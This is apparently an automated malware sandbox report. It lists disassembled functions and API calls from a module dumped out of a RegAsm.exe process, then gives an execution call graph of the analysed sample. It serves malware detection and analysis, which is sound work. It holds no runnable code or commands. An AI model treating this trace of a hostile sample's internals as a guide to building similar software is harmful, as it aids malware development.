                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                • _free.LIBCMT ref: 100091E2
                                                                                                                                                                                • _free.LIBCMT ref: 100091F4
                                                                                                                                                                                • _free.LIBCMT ref: 10009206
                                                                                                                                                                                • _free.LIBCMT ref: 10009218
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 1000536F
                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                • _free.LIBCMT ref: 10005381
                                                                                                                                                                                • _free.LIBCMT ref: 10005394
                                                                                                                                                                                • _free.LIBCMT ref: 100053A5
                                                                                                                                                                                • _free.LIBCMT ref: 100053B6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                                                                                                                • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                                • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                • API String ID: 2506810119-1068371695
                                                                                                                                                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeHandleLibraryModule
                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                • API String ID: 662261464-1276376045
                                                                                                                                                                                • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                                • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                                • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2652629310-0
                                                                                                                                                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CloseHandleReadSize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3642004256-0
                                                                                                                                                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 1000655C
                                                                                                                                                                                  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                                                                  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                                  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                • String ID: *?$.
                                                                                                                                                                                • API String ID: 2667617558-3972193922
                                                                                                                                                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                • String ID: : $Se.
                                                                                                                                                                                • API String ID: 4218353326-4089948878
                                                                                                                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                                APIs
                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                                                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:5.4%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                Signature Coverage:1.8%
                                                                                                                                                                                Total number of Nodes:1990
                                                                                                                                                                                Total number of Limit Nodes:56
38071 40ead1 38070->38071 38071->38044 38072->38003 38073->38007 38131 40b2cc 38074->38131 38076 402b0a 38077 40b2cc 27 API calls 38076->38077 38078 402b23 38077->38078 38079 40b2cc 27 API calls 38078->38079 38080 402b3a 38079->38080 38081 40b2cc 27 API calls 38080->38081 38082 402b54 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402b6b 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402b82 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b99 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402bb0 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402bc7 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402bde 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402bf5 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402c0c 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402c23 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402c3a 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402c51 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c68 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c7f 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c99 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402cb3 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402cd5 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402cf0 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402d0b 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402d26 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402d3e 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402d59 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d78 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d93 38127->38128 38129 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38128->38129 38129->38011 38130->38001 38134 40b58d 38131->38134 38133 40b2d1 38133->38076 38135 40b5a4 
GetModuleHandleW FindResourceW 38134->38135 38136 40b62e 38134->38136 38137 40b5c2 LoadResource 38135->38137 38139 40b5e7 38135->38139 38136->38133 38138 40b5d0 SizeofResource LockResource 38137->38138 38137->38139 38138->38139 38139->38136 38147 40afcf 38139->38147 38141 40b608 memcpy 38150 40b4d3 memcpy 38141->38150 38143 40b61e 38151 40b3c1 18 API calls 38143->38151 38145 40b626 38152 40b04b 38145->38152 38148 40b04b ??3@YAXPAX 38147->38148 38149 40afd7 ??2@YAPAXI 38148->38149 38149->38141 38150->38143 38151->38145 38153 40b051 ??3@YAXPAX 38152->38153 38154 40b05f 38152->38154 38153->38154 38154->38136 38155->38019 38157 4032c4 38156->38157 38158 40b633 free 38157->38158 38159 403316 38158->38159 38178 44553b 38159->38178 38163 403480 38376 40368c 15 API calls 38163->38376 38165 403489 38166 40b633 free 38165->38166 38168 403495 38166->38168 38167 40333c 38167->38163 38169 4033a9 memset memcpy 38167->38169 38170 4033ec wcscmp 38167->38170 38374 4028e7 11 API calls 38167->38374 38375 40f508 6 API calls 38167->38375 38168->38021 38169->38167 38169->38170 38170->38167 38172 403421 _wcsicmp 38172->38167 38175 444a64 FreeLibrary 38174->38175 38176 444a83 38174->38176 38175->38176 38176->38021 38177->38022 38179 445548 38178->38179 38180 445599 38179->38180 38377 40c768 38179->38377 38181 4455a8 memset 38180->38181 38323 4457f2 38180->38323 38461 403988 38181->38461 38187 4455e5 38196 445672 38187->38196 38206 44560f 38187->38206 38189 4458bb memset memset 38193 414c2e 16 API calls 38189->38193 38191 4459ed 38197 445a00 memset memset 38191->38197 38198 445b22 38191->38198 38192 44595e memset memset 38199 414c2e 16 API calls 38192->38199 38200 4458f9 38193->38200 38194 44557a 38201 44558c 38194->38201 38441 4136c0 38194->38441 38472 403fbe memset memset memset memset memset 38196->38472 38203 414c2e 16 API calls 38197->38203 38208 445bca 38198->38208 38209 445b38 memset memset memset 38198->38209 38204 44599c 38199->38204 38205 40b2cc 27 API calls 38200->38205 38445 
444b06 38201->38445 38213 445a3e 38203->38213 38215 40b2cc 27 API calls 38204->38215 38216 445909 38205->38216 38218 4087b3 335 API calls 38206->38218 38217 445c8b memset memset 38208->38217 38274 445cf0 38208->38274 38221 445bd4 38209->38221 38222 445b98 38209->38222 38210 445849 38655 40b1ab free free 38210->38655 38223 40b2cc 27 API calls 38213->38223 38231 4459ac 38215->38231 38227 409d1f 6 API calls 38216->38227 38232 414c2e 16 API calls 38217->38232 38228 445621 38218->38228 38220 44589f 38656 40b1ab free free 38220->38656 38610 414c2e 38221->38610 38222->38221 38234 445ba2 38222->38234 38236 445a4f 38223->38236 38226 403335 38373 4452e5 43 API calls 38226->38373 38242 445919 38227->38242 38641 4454bf 20 API calls 38228->38641 38229 445823 38229->38210 38251 4087b3 335 API calls 38229->38251 38230 445854 38237 4458aa 38230->38237 38587 403c9c memset memset memset memset memset 38230->38587 38243 409d1f 6 API calls 38231->38243 38244 445cc9 38232->38244 38746 4099c6 wcslen 38234->38746 38235 4456b2 38643 40b1ab free free 38235->38643 38248 409d1f 6 API calls 38236->38248 38237->38189 38270 44594a 38237->38270 38240 445d3d 38269 40b2cc 27 API calls 38240->38269 38241 445d88 memset memset memset 38252 414c2e 16 API calls 38241->38252 38657 409b98 GetFileAttributesW 38242->38657 38253 4459bc 38243->38253 38254 409d1f 6 API calls 38244->38254 38245 445879 38245->38220 38264 4087b3 335 API calls 38245->38264 38247 445680 38247->38235 38495 4087b3 memset 38247->38495 38257 445a63 38248->38257 38249 40b2cc 27 API calls 38258 445bf3 38249->38258 38251->38229 38261 445dde 38252->38261 38722 409b98 GetFileAttributesW 38253->38722 38263 445ce1 38254->38263 38255 445bb3 38749 445403 memset 38255->38749 38267 40b2cc 27 API calls 38257->38267 38626 409d1f wcslen wcslen 38258->38626 38259 445928 38259->38270 38658 40b6ef 38259->38658 38271 40b2cc 27 API calls 38261->38271 38766 409b98 GetFileAttributesW 38263->38766 38264->38245 38276 445a94 38267->38276 38279 445d54 
_wcsicmp 38269->38279 38270->38191 38270->38192 38282 445def 38271->38282 38272 4459cb 38272->38191 38289 40b6ef 249 API calls 38272->38289 38274->38226 38274->38240 38274->38241 38275 445389 255 API calls 38275->38208 38723 40ae18 38276->38723 38277 44566d 38277->38323 38546 413d4c 38277->38546 38286 445d71 38279->38286 38350 445d67 38279->38350 38281 445665 38642 40b1ab free free 38281->38642 38287 409d1f 6 API calls 38282->38287 38767 445093 23 API calls 38286->38767 38294 445e03 38287->38294 38289->38191 38290 4456d8 38296 40b2cc 27 API calls 38290->38296 38293 44563c 38293->38281 38299 4087b3 335 API calls 38293->38299 38768 409b98 GetFileAttributesW 38294->38768 38295 40b6ef 249 API calls 38295->38226 38301 4456e2 38296->38301 38297 40b2cc 27 API calls 38302 445c23 38297->38302 38298 445d83 38298->38226 38299->38293 38644 413fa6 _wcsicmp _wcsicmp 38301->38644 38306 409d1f 6 API calls 38302->38306 38304 445e12 38310 445e6b 38304->38310 38317 40b2cc 27 API calls 38304->38317 38308 445c37 38306->38308 38307 4456eb 38313 4456fd memset memset memset memset 38307->38313 38314 4457ea 38307->38314 38315 445389 255 API calls 38308->38315 38309 445b17 38743 40aebe 38309->38743 38770 445093 23 API calls 38310->38770 38645 409c70 wcscpy wcsrchr 38313->38645 38648 413d29 38314->38648 38321 445c47 38315->38321 38322 445e33 38317->38322 38319 445e7e 38324 445f67 38319->38324 38327 40b2cc 27 API calls 38321->38327 38328 409d1f 6 API calls 38322->38328 38323->38230 38564 403e2d memset memset memset memset memset 38323->38564 38330 40b2cc 27 API calls 38324->38330 38325 445ab2 memset 38331 40b2cc 27 API calls 38325->38331 38333 445c53 38327->38333 38329 445e47 38328->38329 38769 409b98 GetFileAttributesW 38329->38769 38335 445f73 38330->38335 38336 445aa1 38331->38336 38332 409c70 2 API calls 38337 44577e 38332->38337 38338 409d1f 6 API calls 38333->38338 38340 409d1f 6 API calls 38335->38340 38336->38309 38336->38325 38341 409d1f 6 API calls 38336->38341 38349 445389 255 API 
calls 38336->38349 38730 40add4 38336->38730 38735 40ae51 38336->38735 38342 409c70 2 API calls 38337->38342 38343 445c67 38338->38343 38339 445e56 38339->38310 38347 445e83 memset 38339->38347 38344 445f87 38340->38344 38341->38336 38345 44578d 38342->38345 38346 445389 255 API calls 38343->38346 38773 409b98 GetFileAttributesW 38344->38773 38345->38314 38352 40b2cc 27 API calls 38345->38352 38346->38208 38351 40b2cc 27 API calls 38347->38351 38349->38336 38350->38226 38350->38295 38353 445eab 38351->38353 38354 4457a8 38352->38354 38355 409d1f 6 API calls 38353->38355 38356 409d1f 6 API calls 38354->38356 38357 445ebf 38355->38357 38358 4457b8 38356->38358 38359 40ae18 9 API calls 38357->38359 38647 409b98 GetFileAttributesW 38358->38647 38369 445ef5 38359->38369 38361 4457c7 38361->38314 38363 4087b3 335 API calls 38361->38363 38362 40ae51 9 API calls 38362->38369 38363->38314 38364 445f5c 38366 40aebe FindClose 38364->38366 38365 40add4 2 API calls 38365->38369 38366->38324 38367 40b2cc 27 API calls 38367->38369 38368 409d1f 6 API calls 38368->38369 38369->38362 38369->38364 38369->38365 38369->38367 38369->38368 38371 445f3a 38369->38371 38771 409b98 GetFileAttributesW 38369->38771 38772 445093 23 API calls 38371->38772 38373->38167 38374->38172 38375->38167 38376->38165 38378 40c775 38377->38378 38774 40b1ab free free 38378->38774 38380 40c788 38775 40b1ab free free 38380->38775 38382 40c790 38776 40b1ab free free 38382->38776 38384 40c798 38385 40aa04 free 38384->38385 38386 40c7a0 38385->38386 38777 40c274 memset 38386->38777 38391 40a8ab 9 API calls 38392 40c7c3 38391->38392 38393 40a8ab 9 API calls 38392->38393 38394 40c7d0 38393->38394 38806 40c3c3 38394->38806 38398 40c877 38407 40bdb0 38398->38407 38399 40c86c 38834 4053fe 37 API calls 38399->38834 38402 40c813 _wcslwr 38832 40c634 47 API calls 38402->38832 38404 40c829 wcslen 38405 40c7e5 38404->38405 38405->38398 38405->38399 38831 40a706 wcslen memcpy 38405->38831 38833 40c634 47 API calls 
38405->38833 38968 404363 38407->38968 38409 40bf5d 38985 40440c 38409->38985 38413 40b2cc 27 API calls 38414 40be02 wcslen 38413->38414 38414->38409 38422 40be1e 38414->38422 38415 40be26 wcsncmp 38415->38422 38418 40be7d memset 38419 40bea7 memcpy 38418->38419 38418->38422 38420 40bf11 wcschr 38419->38420 38419->38422 38420->38422 38421 40b2cc 27 API calls 38423 40bef6 _wcsnicmp 38421->38423 38422->38409 38422->38415 38422->38418 38422->38419 38422->38420 38422->38421 38424 40bf43 LocalFree 38422->38424 38988 40bd5d 28 API calls 38422->38988 38989 404423 38422->38989 38423->38420 38423->38422 38424->38422 38425 4135f7 39001 4135e0 38425->39001 38428 40b2cc 27 API calls 38429 41360d 38428->38429 38430 40a804 8 API calls 38429->38430 38431 413613 38430->38431 38432 41363e 38431->38432 38434 40b273 27 API calls 38431->38434 38433 4135e0 FreeLibrary 38432->38433 38435 413643 38433->38435 38436 413625 38434->38436 38435->38194 38436->38432 38437 413648 38436->38437 38438 413658 38437->38438 38439 4135e0 FreeLibrary 38437->38439 38438->38194 38440 413666 38439->38440 38440->38194 38443 4136e2 38441->38443 38442 413827 38640 41366b FreeLibrary 38442->38640 38443->38442 38444 4137ac CoTaskMemFree 38443->38444 38444->38443 39004 4449b9 38445->39004 38448 444c1f 38448->38180 38449 4449b9 35 API calls 38451 444b4b 38449->38451 38450 444c15 38452 4449b9 35 API calls 38450->38452 38451->38450 39024 444972 GetVersionExW 38451->39024 38452->38448 38454 444b99 memcmp 38458 444b8c 38454->38458 38455 444c0b 39028 444a85 35 API calls 38455->39028 38458->38454 38458->38455 39025 444aa5 35 API calls 38458->39025 39026 40a7a0 GetVersionExW 38458->39026 39027 444a85 35 API calls 38458->39027 38462 40399d 38461->38462 39029 403a16 38462->39029 38464 403a09 39043 40b1ab free free 38464->39043 38466 4039a3 38466->38464 38470 4039f4 38466->38470 39040 40a02c CreateFileW 38466->39040 38467 403a12 wcsrchr 38467->38187 38470->38464 38471 4099c6 2 API calls 38470->38471 38471->38464 38473 
414c2e 16 API calls 38472->38473 38474 404048 38473->38474 38475 414c2e 16 API calls 38474->38475 38476 404056 38475->38476 38477 409d1f 6 API calls 38476->38477 38478 404073 38477->38478 38479 409d1f 6 API calls 38478->38479 38480 40408e 38479->38480 38481 409d1f 6 API calls 38480->38481 38482 4040a6 38481->38482 38483 403af5 20 API calls 38482->38483 38484 4040ba 38483->38484 38485 403af5 20 API calls 38484->38485 38486 4040cb 38485->38486 39070 40414f memset 38486->39070 38488 404140 39084 40b1ab free free 38488->39084 38489 4040e0 38489->38488 38491 4040ec memset 38489->38491 38493 4099c6 2 API calls 38489->38493 38494 40a8ab 9 API calls 38489->38494 38491->38489 38492 404148 38492->38247 38493->38489 38494->38489 39097 40a6e6 WideCharToMultiByte 38495->39097 38497 4087ed 39098 4095d9 memset 38497->39098 38500 408809 memset memset memset memset memset 38501 40b2cc 27 API calls 38500->38501 38502 4088a1 38501->38502 38503 409d1f 6 API calls 38502->38503 38504 4088b1 38503->38504 38505 40b2cc 27 API calls 38504->38505 38506 4088c0 38505->38506 38507 409d1f 6 API calls 38506->38507 38508 4088d0 38507->38508 38509 40b2cc 27 API calls 38508->38509 38510 4088df 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088ef 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088fe 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 40890e 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 40891d 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 40892d 38519->38520 39115 409b98 GetFileAttributesW 38520->39115 38522 40893e 38523 408943 38522->38523 38524 408958 38522->38524 39116 407fdf 75 API calls 38523->39116 39117 409b98 GetFileAttributesW 38524->39117 38527 408964 38528 408969 38527->38528 38529 40897b 38527->38529 39118 4082c7 198 API calls 38528->39118 39119 409b98 GetFileAttributesW 38529->39119 38532 408953 38532->38247 38533 408987 38534 4089a1 38533->38534 38535 40898c 38533->38535 39121 